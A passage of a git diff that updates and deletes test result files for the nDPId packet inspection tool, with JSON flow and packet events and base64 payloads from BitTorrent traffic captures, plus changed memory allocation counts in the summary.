+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","total-events-serialized":133}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 299/299
@@ -139,9 +139,9 @@
 ~~ total active/idle flows...: 24/24
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4938316 bytes
-~~ total memory freed........: 4938316 bytes
-~~ total allocations/frees...: 99945/99945
+~~ total memory allocated....: 5015725 bytes
+~~ total memory freed........: 5015725 bytes
+~~ total allocations/frees...: 101535/101535
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
 ~~ json string max len.......: 1454 chars
diff --git a/test/results/bittorrent_ip.pcap.out b/test/results/bittorrent_ip.pcap.out
deleted file mode 100644
index 75a2ae183..000000000
--- a/test/results/bittorrent_ip.pcap.out
+++ /dev/null
@@ -1,31 +0,0 @@
-00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent_ip.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492508985380,"flow_last_seen":1492508985380,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"ts_msec":1492508985380,"l3_proto":"ip4","src_ip":"185.56.20.36","dst_ip":"10.0.0.14","src_port":53646,"dst_port":35030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-02436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492508985380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1492508985380,"pkt":"GM9eF7izpL8BAjLCCABFKAXcnYlAADUGywC5OBQkCgAADtGOiNaC0hsOOk8HpoAQAQ9pDwAAAQEICnOGuIMAaon5wq2wH+fJAB37WaFc0xGrpC62Mk25YlmPUd6ck3UOPlnlmaLDK5iccRQxV6Lrpsvp\/uuH07fwJI5d7\/2xQsXKRbbf\/dZsog8rfXyOu4oWkiFqn16z1YOEpNojRPpe7v7oH86SIuoL3dpLCw3AXEVUNxwx2S7LDL5\/rfeDM8+Bcl\/\/R8Opw8m+od\/En5GEEzZ3xGrHEqfzxOcCFet4txleRVwSMtJGmJGEZlxnSc9bQojqyP8G3\/vCd1PweWLboTk+NjSajTAv1YG+aTAyluKRr0qFOpDKQmC3IVqzr4W9DmG3o93pWPJfaiwZdc0LXafyZIup0T3O+0SD+1KX\/MXVxLlbkrHIObYhG0KRzwzkIiO\/HR3aqzKcLzpGqVYzgATNkx6loBM2zXf8m\/XhjwgHW\/CGReGZFPmB8J6GzYgFDRMMKktYU5wo0oK4SF13YaHyFNIDAJL3DAyL5r+1U9G1+dr8PIMRJp4\/FwQSe6a94CTR4ZskCkdLrs8tj1RsuwrXTbzvqBJzUsQBm9rJfZm4y9w1pfULJ8D1TYjJjMzSDEl0T6hV8EZ4dmzL6IhYkOgH8tql6Y93Y0ddSoYv324931xWI\/bR1RKV7BANQbXUG2pG0h2KZpa6XgVabRUtP99Tr7\/5gqL\/IS2bD5xlSK1xPITsCAn7s7qmMuBYou\/b61yEnXpRH5c7+HPoOUXeVk4W9oZrQVAXk5BbSMEHW5RfTBUhNP++2i6eHn+vUbuL8UK5lLIATIcvvZI9dlyGFiLHDfDqqIZCrFy3RyOhH2X\/YORdIg7sw\/ndDLMFBseU\/KWeXwePK6mHg0z23nZaHdFSoeEOxwrWY0lgWUBWjSyZYzTSBwlfgqsQztiEM77xdLWOhbIlx8\/nuG0COEMh2y1lyIiYlKLCMQXTS7K\/j1FVuF\/8tvPyElMf3rWajnXt3EqUVmFpQ6LS9QxFLTpgEdeFnf2qL+AmoEuGUjU9kJweI25uL0Z9lzpQhvvCq8wd9I+ftZPKuA6dZ\/k3GrkabkYxGDbzhE5ROw\/DgJVMx8YTocrJYMUrgGEF+p9he2ru4LLtxOeShPq42CbnIGyZfsPr53QY+AEuNN1DHzxtN+wF\/8izHYs9Nm7vOWO5FyqA5I1eXm+bYBqxrutPktuKTr3AfJQHxFyberh\/WGaCmyY1JDhaxqT6lahZjq\/D+h\/+cEW317H+1sg6aF1yFTeoDuELtGhphh\/6RwybG6XySF4DX3+mdR3VpDjIljqG2zlOcw4y9GPTB0vD0AfEp6VvCyFfJDbXcmK3LpFLGEF5msQT5bCRePIl2ts6C5\/K71IHEGDPO2Pna8kfaM4QGJ2FEOm\/xWLLsagIQPw6MSeEcAjjO6xkOeOb7btfefPF4Kqyu4ZO6Dzvgl7z+p4BOxyjwIming13hAtv7syoCsUTcyEZ7qN3Z1aE0wB8ZLg5qK0FPpcYv5DNjm96suA59qoy4XiMdUVp7mB3au2pxK33YcDYQwNH4vEAMRMnaiZbwUYX7PyP2fmGyj4etY6\/bzsgqteorOb3gC0UWBkYEiO9kyElGbVXiYAbr+cNxxY6pf6owquBKfCW+9gNQM1Gf3JOhOZXrurW533Z43nBgLYv3+V+2tLwZ1ozPyKPrSjCuP15ektq6c1rgVAbemep1fdRC8ScYX38M92H9PR2+eGCsHtEDQpBXk5LKK8TFCIvKYqIOASd2UUU5JBJTDxPo8Dwxaolh1aYwuyIWd2Y0ZZS0MaxB03Gs37ZQEebCoytVUbaQ8N4pKz7QcsA+9kfdLFgkcDGaBaeG2k\/9sjsS9pkJk1hIC0qCshMy5uCV2qA5VPCarO85ASgoheRo5nDYkD5BXNn2XlPP\/DEADBYv466aYqeaVlkvH4VxCi5CTumh0poopX16s9g9P5WDW3G3znJwzFtdiZlOelig10="}
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492508985380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492508985380,"pkt":"pL8BAjLCGM9eF7izCABFAAA0h3tAAEAG294KAAAOuTgUJIjW0Y46TwemgtIgtoAQCI+fXQAAAQEICgBqiw9zhriD"}
-02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492508985381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1492508985381,"pkt":"GM9eF7izpL8BAjLCCABFKAXcnYpAADUGyv+5OBQkCgAADtGOiNaC0iC2Ok8HpoAQAQ+BVgAAAQEICnOGuIMAaon5BuPRLy3uJClpq06N5WbznePjpAb33PwIhDmQzu2amLpqojqD8pITOs+XbaoSgUtCjoMw918bf1kT0PwfNLnQaxL48UHV7myOpaEdJ8VltTypXbxcXCetJJM6gRvH7ym+4hJ4tcr2zekZutLAQjA2A1uiGfgzMF1ut0E7fVqsfQrYv72\/xPwmLPE4vfQ2X8WomSOaMi4wt5m+fmcqD7e+bckg26tp0o+Czgwy47BmFi4tSe42zJqjwrbuZnRxl5R1O\/j7cS3DzHcfxdJVuWBfwx1MvQ49JuS6eYyLe3XQFNuxixXY6GXXeERkcbxBT7Lb1riJflqG+q1NPO57Xk5XbpGzlWX5ncKkblZ3LrRtwKyglC891nWyCbf2GMAiMGfnq2EhxvbsKz+j\/pt0frlmE5XglerKsRhqlt4JvKk9gCPdDlnkSpgt6vcuoRIOxrfm2eTAVfNhx6CQ2IuVPhOAasCwOkG8pUGkqRe6LODGhZMagzSpBj0qEbTOP\/nZ1wDKXgmIFlGyxm0yxZeJOVzBPs3Wrce7TsuReOlTpVaNLpjSe0nIjh79sNpzxXRN3fq+DrJoG6mde11Cr+PE0XpMjWYssAFpJAtA5MN5uyVzdtyGbzHO2mZ2dVQuy\/LKNeOg54Hed4XqXZ+YkcRdAV+qxpt+i5443UdMfoggkY6Dgmeas8IoGPIxy\/F1aYn\/0ntdXOdQCtLaPtnVeWNZ4i8Y1jQqdGs5FP\/yYvhK9ZjwZ30aedmX7HdQavUFTxo+CIzJDcVRVJmSizwljNmn53GAdwtF9ZOliUAJGuhU2aX2CdjlNpcIIhcjR22VSkt2uEj7UTioi2efL2UNX9NvUsNym+l5gYa4e5G1cEFwRCjaIVkqdDBSDJdg3POuDFgeU6vIhhLuQXoicw04wO+Xjc+NIvW0g4HOyvXMjMLo+1lIXWf\/wil860bZ8dcJKnGIOZaWsA0QaDBIFhW1u2oBSFO\/9AXIm8behQDqQz5asWfGHjJdg8Oy0tMlQWMBK9pDo30IjNPez7bfZj9hxZ6sb5FDvSj6iwwn1H6NIpmLF6aF4BPDl5bvjAlqbaae6vn\/bEdweGulxxyKri96vRMASxK0NDSViZF9pzX2TEtg1z68PnNJexmxFyI\/1\/jw4iTSFgTpmkWn\/HZdU52OFen96owDvY6j78ZdkHaN1r4xDrNDPIeqxWhgvXe8ss4awVKrb2YX089D\/MitjkeShQZBZ42JvzMY5MvxJSl2zFv\/L6rNZ7NgZ9+eUWL\/AfLeo5F1xuMTKDJsFgJFmRyraDsNdpy+6q7fX6k9D+pabZs6K158Kg0fVT2yQIBroDGxM1QE8faZZCIHtc4OXJfstrC3lA8Lmy+ub2Vhg790zL7DKhf3deHSySeAIxpQlVytfpOeRHbueQ977qmpJ6mNwxivN07QLge+I5TV9UAm8C\/8mEKXRZwCTgksGem0MHtLQHcHgAyVq3DwvrLIbgJFg+qrY8f3YSjrTKDCxnFFqEf\/k+DpR0PIB8vx8d6i7CqO80LKMLY09+pIsRbs1iaREhcvxtiSQcPorl+xzUOpFF+ynEOJwniCrLZ9Um3lOIQwekvMzVg1\/E8kwhzoUVfq65oC1Nj4qhJYXWBdOegYHdoLPw9e8D61y3JA8fmRXFd1eMX4AQ4se+E0wzfA\/1x2bkZe2YNOndoBBB+Nl1kSDpp36avXMKGGqgGUv8JnWRPrFSmswcbiHJFltbqFgrm3JaB6LsMDYkZ3Q4oWjkBYH+AqtZlcLeDiXmiTreMV7hQ1sYkZnyoS0VB6rFVH+0+WXLmbOY7Um0YGrs3I2CFSOj2qxt9f9kMiKPgQpbYcoA9TAl7kD4ysSlXUeSvrMg63NJUKn+J\/RHzYJDMuRaxlCrLjRkiwIAM6wOD\/KLQPtI6e4VYwtvjiy84faZt6WMI="}
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492508985380,"flow_last_seen":1492508985500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":23168,"flow_avg_l4_payload_len":724,"midstream":1,"ts_msec":1492508985500,"l3_proto":"ip4","src_ip":"185.56.20.36","dst_ip":"10.0.0.14","src_port":53646,"dst_port":35030,"l4_proto":"tcp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492508985380,"flow_last_seen":1492508985500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":23168,"flow_avg_l4_payload_len":724,"midstream":1,"ts_msec":1492508985500,"l3_proto":"ip4","src_ip":"185.56.20.36","dst_ip":"10.0.0.14","src_port":53646,"dst_port":35030,"l4_proto":"tcp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492508991649,"flow_last_seen":1492508991649,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"ts_msec":1492508991649,"l3_proto":"ip4","src_ip":"77.222.174.20","dst_ip":"10.0.0.14","src_port":2866,"dst_port":46610,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-02438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492508991649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1492508991649,"pkt":"GM9eF7izpL8BAjLCCABFIAXcXOpAAFYGvBFN3q4UCgAADgsythIFf+fAyg3zkIAQAQRWiAAAAQEIChotFWoAapAXoFZsJoOEMtF8fPEtH7H+tnsdcSzA336oJmu4Vmd4+L0QrQI3vtKCetbBuRYf5q6g4O6T0Jwp+QqkdwPc7HIErcfsszej+MIWFWM+kOUmjcQ4ZzXdJdcDBn8tOzKM\/z8HdD\/MBa7YQ6L8mDTXwMbVhCmQLgbAVb5T2wqH8d9UkDVqlE4CdoiXFdq7BoinmTI+n69Jp92R8vC9PLr05497LGrl2kCzOEtw5RufMIBravi7K9SBGj9g6MGJ8Fw8hqrm0xOpXgEmn75Yv5o7t9GISbIYVy6cnlHVv3p+RW+VMGwcGC7\/D8E\/tusAAI1dhhSRgUnFFYFSAhbWAYsPLVL6f2ZAA68rnkVJyWqRKoLWS9t6fiygCJzsXpD9reclTF0ougyKNwzaySeCWEv0QML+Mc8VyLOsOYyTGjsuSAfPgnofr1U0FX0E+Zvh\/RvKsbWYAahJWgUlShdPHqEf+qR\/o\/pKADGNHH1h3AqhOjp1sxLJwUPyaG5MlbUXcKVh61M2C2gpAegg7EAaAMPjQxLgKq\/PP7MNzdJEA63NK8hFrb8ZkqIDg3piw43Cunv\/XwlxpJUPkgp65a0PBs0M2QTqbJUuWTg2V4FnBQVHNECBwZQ4vvIu0vJQqGvH\/1zLIgddrBciuHp1CsBXaHYMArE\/398PWRUyXJEwhjJvpcr\/Uq2id0s9SinNP35BTHlbGR301Q0vBviN5TCZSdt50xv+uNPxsXhH0qlx5d7nEbPjEt1LaE3rg6CTrMllJQv9RJgn1gkpfaOQCka2Oxa\/B3z4el5uj9l5KnbMyvg\/P2FuSDbdV0g3ONFCT1KjW6yeLDaOGaYVsHSACSF43ghrE5lHyI011V2XTfwRwthCTlThs8g\/780ycHMTFQxKocL33iHFGEvuHAXD1GwgQlFY2VYQPl4UylaE5WnB5+k25VUMulXxcNr9Vrlfv9ZQS5WGr6fv\/lbK6o+guHKYyXbUs\/gpwBFqjud16lcsgZL+rWu9vscuTUuStWZG+nCx\/6SZbSTD\/nZ7xafjL7TxukeSNLa8cdjTDxIBHS+e0QwJp7L36i0Jn33HjvSTZoyG4YNIg0PFii7jtuvKebpx1Ad2MDsC+Inwz4W+7FiI30s+aTiXOnwEKsi2Rvla0\/A4j6JEujop9WovLrEfeuwn9m4qKx7igLTJZcpSUUSSpzTCh0SHieWaepQl+\/WY4XaKtEBTPCGDH1Y1xQkC0fZv2v\/wPULChMHwxkA8jqK1+ntgDOWX9aH78LcwkyQC3fhQvIjJN\/zj3BUJpqROJBIiWV1\/owLBEFZXhl8JqX02\/sm\/uWY4H4jERLsn5zGEQkjIDgit3OfyHPsoVLm4OswgtlkPQbN2IXxNoNcFUwT1ffARs\/DtLlXY7vNEMgQg3FzRVLiunvO29LGYW7dLFc1U3HxByATWLIpVBA6SiX6sITCkjHO+NLpV37cQFSe9jAKO\/fmb9voWfNIdLzvieh8R7MyORkneGyzSqqUJhsc60hN5SSUTqEFaWPZZCGV30wCKl8\/4lJWmdAQZXC4VPd47njmoImX2HL9aH+gazhp\/2y3hvOlvHHPBMSupE2t4RF3jx9kbuVQCSq9osZktCArUv0ri0ZtR5dNz9DV72xERQVKh6U0XXmbmdXWVmw0OA7m6D\/q3NiRmIfYybOWSbQIatIdYO04QXBCsK7111IbYcEVX74or\/kfGT6eIISYtZHYWAXjPKfIrY+lUMW47gfW0LcohEMRBAUK\/jBCTv5rV4CdfOUUTqfzCQHxmMKSJdiDkoGJNJ4IvyWLatplgOPd4RDMYBVNuZILHQw3bWbpI5ynVbrCBaM\/SysRaZ1jDvedzcl2b+8fJIvh9PiapmS7NU6IDXTaW1NJ2N\/lM+2DD0w14cFU8GNPo\/XVSUVo9XrZPfQ2OmgPL9X+xhG5Vb78="}
-02436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1492508991649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1492508991649,"pkt":"GM9eF7izpL8BAjLCCABFIAXcXOtAAFYGvBBN3q4UCgAADgsythIFf+1oyg3zkIAQAQTgjAAAAQEIChotFWoAapAXo34tMz4skfaHlYY\/ScNpDxIpCs+P5jEsNAxpbVkUCDph\/pBzMB\/LwnipjHQtHoSdK8T5c6F80YLV8r4yOc6N2BSayttGT02IcKpL4u7OmmkC8v9\/K17IrOvPSiKzm8IXRcVGvWLEe7mSpkbGXP8Zg500fAiD07gmzEjqDvcGQwae\/\/c+fT68j5qTn4EIMnlVV6K3u4\/YjaSNQ5X0kUrG4oshGwbT6lOr7qjrcpHx811m57vXMYMYdLpZlpYL3oCUJJoZmbYnALEOz0mDJkuefbnLwlSq1HWKxOP+GdZiMuM3zqBFAhRFpOw0wsHIgYwiLZnjgU2necxHkVHPeXyRvs7PXtFfjrsS9PYsP4dh+js8z\/HcmJYGR83xYLEXA4a0\/eDgV2ZN3mJ246foC2z7ESpSlbDC7rDC7kxPuL+vxgE1IJunPjOeZX8vRzrWdOhpseT6UBY+SivCjRALwumw8jaII\/0avXIXosCaJWtRKZMmdFQaTdoQK8gsWTQBoGt2TE2kZXnWB\/rApZxcgbQEyzgxgcTfZBPcV\/3V1jRhF4D7oaPJc9EpwDGnjV9Mav5Q3stag588iPoH2gzQBtl7pZHgOHi1XQcz5kB19l3w4lPjAd5YKvzqL2+O7HLsqkxJvCc9xdSQMeZIq61Xc8hUjm3R8ibutovYPhKqO94ataVUmAYrTHLBUiOgGFBdvIxrvTCmQQ9Be+7ybkUWeqSsixsDWzQI5UUaBY0MPN+FMMQYdval+DZSlnOiTbIx1T7PKkq\/0wFPkNyo0knB1r\/EsQVn2O7BFGfSq4gT9z+dYK0E9w3X7FjlS86WoHdTb5RRBw8xH8Fh7dSqdNJBR1IzH\/32Lu5S+67T0h\/5z9BRLTqqyqP5iwd+vtZ0GOkBYlS9TsOPdxhIjSaj1w5CC827\/kTX3P5CMBTKq5L34ltxCBEy4fxlNOgSgyr2c8CzN7W3+9q\/2lQHIwhVb+JW8Wui9hDMNU\/wujR5n32OFvwD2QHVeJRQHs166q6yxxlMKx68f6TXlexEhPC+g5jAK+iIE9t12iL2zbNyEIrU9BGVwHSjvi9dn\/R2rW6+XZTQ5m9I2MvRHE4KW0mfjS0Bbxx07TQtwhn0mE\/CuyZtLYMHn\/xUxoXUl6ReTcf+DQcD6PDQVb5u2Ac3XqIXomVn6ks7GOKGpAS1vo1sy9N9B92UnP\/Esv0qk5vYtzQGnayZMCdNm5iN7cXyeHDQvrsA\/syaRP23zdQSDJwkhDiC7grWYuL00L2z9fymp8OdI6qZlZmC5UP5erWZ\/y\/NATjfTE2lPIZ4CufAdTNaV+HL\/OENr7VzqlcUSPMJUpZe\/uPBX4hb5PTr2k79iqBn5W2bAOg7f8OUTsuGNCRx2esiT77WgsjtYMLWGohNp8xgnHEQ\/f2U+Umki8C6MAJk5V+ShBv27oPYtAaESwDy4i6pXIdNqgYbuC8tjYHTTxYVK5PLBUAnT7sfWJ9tNba8K7LfESYNsMZ2NEyYLSogogqOIBqX2RhGWFxZmcmNyMr+mipx2RqzLPtlvv8+kvPsAMtUmyl3amIiZgIvn8KvwnKuxavASbzL1yhnGFf8G5TIUTVmmJkA4hggxNpWmxxcPef\/HOamo4tsekfmXeSCur6ixMEpKu8xonqrX8ZyK9dEJzbc4+ry2K3zY5v+u6KriUQwOdDYzrn9xlIYWXlKpIJMaRT7Yel9DnXLtQGGVgPboCYRdqKv8AvtOJ6Ejw2yug8KSDGMadC0cnfSs\/SOYlGavKDGmtW94SCRgDE3gRafvD+c0eaoWKwQu9\/JSnpokqEi2gK8TdXJt5arUnG6ISh\/qG477G+d+KyVZJFRXyLBDKMJVuCHgdN+PBrPL2G\/4T28dATlQcAmGchVsj0We7WEFzT6cH7Ok7VBXgCxQGetulH4jjNutVlTNpowG9g="}
-02435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1492508991649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1492508991649,"pkt":"GM9eF7izpL8BAjLCCABFIAXcXOxAAFYGvA9N3q4UCgAADgsythIFf\/MQyg3zkIAQAQTEnAAAAQEIChotFWoAapAXin3jI4ARKjVzLsHKHqf0eIbRIWzLABcT2\/h2G1F+6R1+NYd0dCvt0tnxxfqRWn1RYuahphiLQ4wktD8lNPU4DtXpNdlpqumKgvrZFXodsWrom1N8t6xryu\/E0m1Z1ql1ee+DLth6NH74VmruNLYD6SnIbzvOwjO0xPCx33wakRciHkq7RP5ztglIb5eBKAYKpFTqldfebbBBj2NzIkO09M5Li6a0Q+yGxmjFz7xt3wmahWpzenfF76rsuBEBdPOGn3cIIEo9V4GpW\/1Lcy2Y6golYpINKPuoe051x0p6EfkwNEgNTVI5PknJjh8DLQy+S+iiabNPy4Wuz4Z29sO3UcTbI0FXzNSE5+arxO9fGVzsHQZMzMmCpF9GrK\/B30GHG\/ZyHQhyziSR6y4xyvAdJ8nTfZFnUBURWjDzzHbLKGnUTQljhNTua44LZUkCPYPLvnSqy3oyAbMNEHf\/KaPyDv4qLw3IB7d\/2XNyxwUcZzNdmB1fwMvTAkHYUi\/uqnAjN1mXJltMT5wC7iN8jYNZNjPeE0a9hYlUtRfFiUPLxbpYYVapCnh2FX+Ctm8GX4fkqVbh9kSeGcLX9kJLBzDy3Uop3tSAD5xZHmhI9Q\/IPKsJ8jLCiu9IY8O4W0azacMqwq+e7GXbIKTziJnlV+q1WBdAYrxocVCNXeDGKmflDYMiuGvRsv18Jrf\/dTmHFWW1R1LuDQtpnQOev\/ZBOBXXD88wiwd8mSiCjN+1vRnCm3P5te+C1QJm4c9BezvsE7mVWhUpIyw2keZusvaHbIKjJv5qf\/xE+txjn2o\/x+3YZBsV5yTHUYDBHIRKiiAfMckqW2pwZZOXQ9IlIQYT5UN6o1EA4NhUw7oaR6J1NgSTOxxPFScL\/3+F5TDHrQg7TBZaLbbHXVKbpo7mvD36CLfqDYNXssdIEltIBoy8AZRd8xI5GQuI5gFP6Wjf\/3ooDq6WagIW4vzQx0UC3+X\/w7COBEw6kRpulcGFosgCWGhwgAMrtTSilcfPSfMq2VgN\/r6xOs3egY\/Ge42To0LGUB\/vnPYy3Cy6lIZ0jPqucO4NwE9iO1vMeB0CPQwGmzE5iKea01O9t8Wm6iirfnMI9eXzbKY1ux0ThzsmJTNJBFy\/WfcKj3WsWoJBBTgEtxjS1EqielS1GSFQEHjui24ubSBIaCgeQ96sdh3IObHf9FOqkiMIhh3ltxxCHP0Km7DyQzN3HJcL+xjpP3Ae6E+FFo7LOGrYSDbyWcNXbSISJHso+3Znv6YGWBEbXj75Ie69B+d1sZ2\/Yk1ZTb7seX02Fbq1BL4FhkImhuAJO+JnQ1p3pchczUOp8T53M507sNc5xmvei1IGViEBgZtci6UfQl\/2Te3fVdx7hdovgWOoa00R6VxsT2gGeWrcLix0CkBy5U9C2qUC07JgOdY9ysGZcGos4SlBO5NO0xM7t952urMo8OrVFsXvdL28d9XRtQJY7yQy60XKugdg1UYzhmSoQyRjNi5m9+\/V0YeBm1pOWdj\/gOvBNko29IxSXZuGaTEBFpoPFVWPMt\/gVGpFT9m2SwjT2XBytKEyjcppJvDRynyqUq51q\/MW8\/f9uSyn3Q06zJDysyVOgWA7ZmGxp5sxwT8\/Em\/M\/euPjOWONXGNQ2lnBuUlQbOPYhiFMwptuMeZck6Sg30qMH32vhZbKicNnkmDMnUCW3ChWQIe01E02FgtEwaDgj46+76jPfyR7Yf7epGBpMrhlj2Mh7rQWgjjhegI82Evg\/8nW64VVVvU15kEbexGTS0v4x8KcoGnqIsBK0MLIrq8jFQLhK6SQrGlhfZvEzJFlf+4TGr4C4UBx9AnZ8umxn2rXOXQCwiwqElsdIs8KReJMwfCYtUvdEmRNXmClaV+MEiWCDdLnx3HVC7AO6ywQjaBwA25YN6L96xFQTM